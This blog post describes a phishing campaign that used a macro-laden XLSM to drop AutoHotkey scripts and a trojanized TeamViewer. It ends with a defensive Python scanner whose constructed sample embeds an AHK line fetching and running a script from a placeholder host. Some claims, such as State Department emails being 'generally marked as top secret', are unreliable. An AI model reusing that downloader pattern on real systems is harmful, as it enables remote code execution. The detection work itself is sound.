silvercas.blogg.se

Ahk2exe

Government agencies were in a state of shock when they realized that their systems had been compromised with the malicious TeamViewer software. The attacker who was responsible for this attack is a Russian-speaking man. TeamViewer is one of the most popular tools for remote desktop access, desktop sharing, file transfer between systems, web conferencing etc. The motive behind the attack is probably financial. The software was manipulated by adding a malicious TeamViewer DLL to the original software. This mala fide software can steal sensitive data and money from even government and financial networks.

A malicious email purporting to be sent from the U.S. Department of State was delivered to the inboxes of government employees and had ‘Military Financing Program’ as its subject line. The email had a malicious XLSM attachment with an embedded macro. Employees were duped by the malicious email since emails coming from the U.S. Department of State are generally marked as top secret.

Once the victim opened the decoy document and enabled macros, two files were extracted from hex-encoded cells in the XLSM document. The first one was the genuine AutoHotkeyU32.exe program. The other one was the corrupted AutoHotkeyU32.ahk, an AHK script used to communicate with the C&C server and to download an additional script and execute it.

How did the attacker successfully deploy the attack? There are three different kinds of malicious AHK scripts, including ‘hscreen.ahk’, ‘info.ahk’ and ‘htv.ahk’. These three scripts affect the user’s system in different ways.

Hscreen.ahk: This script takes a screenshot of the victim’s personal computer and uploads it to the C&C server.

Hinfo.ahk: The victim’s username and computer information are sent to the C&C server.

Htv.ahk: A malicious version of TeamViewer is downloaded and executed on the victim’s system, and login credentials are sent to the C&C server. The attacker hid the genuine TeamViewer interface while the TeamViewer software with the malicious ‘htv.ahk’ was being run. This allowed the attacker to replace the genuine TeamViewer DLL with the manipulated version in order to take over control of the software.
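As an added defensive example (not code from this post or from the campaign analysis), the triage step a responder would run on such an attachment: a stdlib-only Python scanner that opens the workbook archive, pulls every cell string out of the worksheet and shared-string XML parts, decodes any long hex run, and flags cells that decode to a PE file (the dropped AutoHotkeyU32.exe) or to an AutoHotkey downloader script, alongside the presence of a vbaProject.bin macro part. The sample workbook, the .invalid URL and the AHK command list used as markers are constructed assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

HEX_RUN = re.compile(r"^[0-9A-Fa-f]{64,}$")  # a cell that is nothing but 64+ hex digits
# Assumed heuristic markers of an AutoHotkey downloader/runner (AHK built-in commands).
AHK_MARKERS = re.compile(rb"(?i)\b(UrlDownloadToFile|RunWait|FileInstall)\b")

def cell_texts(sheet_xml: bytes):
    """Yield every <t> text node (inline strings or shared strings) in a sheet part."""
    for node in ET.fromstring(sheet_xml).iter():
        if node.tag.endswith("}t") and node.text:
            yield node.text.strip()

def scan_workbook(data: bytes) -> dict:
    """Flag a macro part plus any hex-encoded cell that decodes to a PE file or an AHK script."""
    findings = {"has_macro": False, "embedded_pe": [], "embedded_script": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings["has_macro"] = "xl/vbaProject.bin" in names
        for name in names:
            if not (name.startswith("xl/worksheets/") or name == "xl/sharedStrings.xml"):
                continue
            for text in cell_texts(zf.read(name)):
                if len(text) % 2 or not HEX_RUN.match(text):
                    continue
                blob = bytes.fromhex(text)
                if blob.startswith(b"MZ"):          # DOS/PE header: a dropped executable
                    findings["embedded_pe"].append((name, len(blob)))
                elif AHK_MARKERS.search(blob):      # script that fetches and runs more code
                    findings["embedded_script"].append((name, len(blob)))
    return findings

def build_sample() -> bytes:
    """Constructed XLSM-like archive mimicking the post's layout; not a real malicious document."""
    fake_pe = (b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00").hex()
    fake_ahk = b"UrlDownloadToFile, https://placeholder.invalid/hscreen.ahk, hscreen.ahk\nRunWait, AutoHotkeyU32.exe hscreen.ahk\n".hex()
    sheet = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
             '<sheetData><row r="1">'
             '<c r="A1" t="inlineStr"><is><t>Military Financing Program</t></is></c>'
             f'<c r="B1" t="inlineStr"><is><t>{fake_pe}</t></is></c>'
             f'<c r="C1" t="inlineStr"><is><t>{fake_ahk}</t></is></c>'
             '</row></sheetData></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed macro stub")
    return buf.getvalue()
```

To triage a real attachment, pass the file's bytes to scan_workbook and treat a macro part combined with any embedded PE or script hit as grounds to quarantine the message and pull the endpoint's process tree for AutoHotkeyU32.exe.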